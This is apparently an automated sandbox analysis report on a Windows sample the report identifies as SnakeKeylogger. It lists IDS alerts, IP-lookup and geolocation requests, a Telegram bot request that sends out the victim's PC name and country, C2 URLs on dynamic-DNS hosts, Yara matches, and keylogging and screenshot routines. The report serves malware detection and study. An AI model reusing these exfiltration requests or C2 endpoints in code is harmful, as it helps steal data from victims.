Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49753 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49750 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49753 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2029/10/2024%20/%2018:30:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 29 Oct 2024 09:16:22 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: M2AB8BeHc4.exe, 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: M2AB8BeHc4.exe, 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: M2AB8BeHc4.exe, 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: M2AB8BeHc4.exe, 00000003.00000002.4182682038.00000000064A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/r/gsr1.crl0
Source: M2AB8BeHc4.exe, 00000003.00000002.4182682038.00000000064A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/r/r4.crl0
Source: M2AB8BeHc4.exe, 00000003.00000002.4182682038.00000000064A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/we1/LTZ9nL9sQRA.crl0
Source: M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: M2AB8BeHc4.exe, 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: M2AB8BeHc4.exe, 00000003.00000002.4182682038.00000000064A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/gsr1.crt0-
Source: M2AB8BeHc4.exe, 00000003.00000002.4182682038.00000000064A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/r4.crt0
Source: M2AB8BeHc4.exe, 00000003.00000002.4182682038.00000000064A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/we1.crt05
Source: M2AB8BeHc4.exe, 00000003.00000002.4182682038.00000000064A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://o.pki.goog/s/we1/tOE0%
Source: M2AB8BeHc4.exe, 00000000.00000002.1736180528.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: M2AB8BeHc4.exe, 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000000.00000002.1740448854.0000000005304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: M2AB8BeHc4.exe, 00000000.00000002.1740748939.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: M2AB8BeHc4.exe, 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a
Source: M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002DDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002C6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: M2AB8BeHc4.exe, 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002C6F000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.72
Source: M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.72$
Source: M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003CFD000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003D4B000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003D72000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003EA1000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003EEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003D05000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003CD8000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003CFD000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003D4B000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003D72000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003EA1000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003EEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003D05000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003CD8000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4180599848.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: M2AB8BeHc4.exe, 00000003.00000002.4176439192.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, COVID19.cs

.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, COVID19.cs

.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.M2AB8BeHc4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.M2AB8BeHc4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.M2AB8BeHc4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.M2AB8BeHc4.exe.4478948.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.M2AB8BeHc4.exe.4478948.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.M2AB8BeHc4.exe.4478948.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: M2AB8BeHc4.exe PID: 6520, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: M2AB8BeHc4.exe PID: 2720, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_05448D90 NtQueryInformationProcess,		0_2_05448D90
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_054492B3 NtQueryInformationProcess,		0_2_054492B3

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_0283DF2C	0_2_0283DF2C
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_04E36C10	0_2_04E36C10
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_04E30040	0_2_04E30040
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_04E3001F	0_2_04E3001F
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_04E36C00	0_2_04E36C00
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_054460D0	0_2_054460D0
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_05449438	0_2_05449438
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_05448788	0_2_05448788
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_054460CB	0_2_054460CB
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_054482C8	0_2_054482C8
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_05444DF0	0_2_05444DF0
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_0544ACDB	0_2_0544ACDB
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_0544ACE0	0_2_0544ACE0
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_0544AF6B	0_2_0544AF6B
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_0544AF70	0_2_0544AF70
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_05444E00	0_2_05444E00
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_05447E90	0_2_05447E90
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FAC146	3_2_00FAC146
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FAD2C9	3_2_00FAD2C9
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FA5362	3_2_00FA5362
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FAC468	3_2_00FAC468
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FAD599	3_2_00FAD599
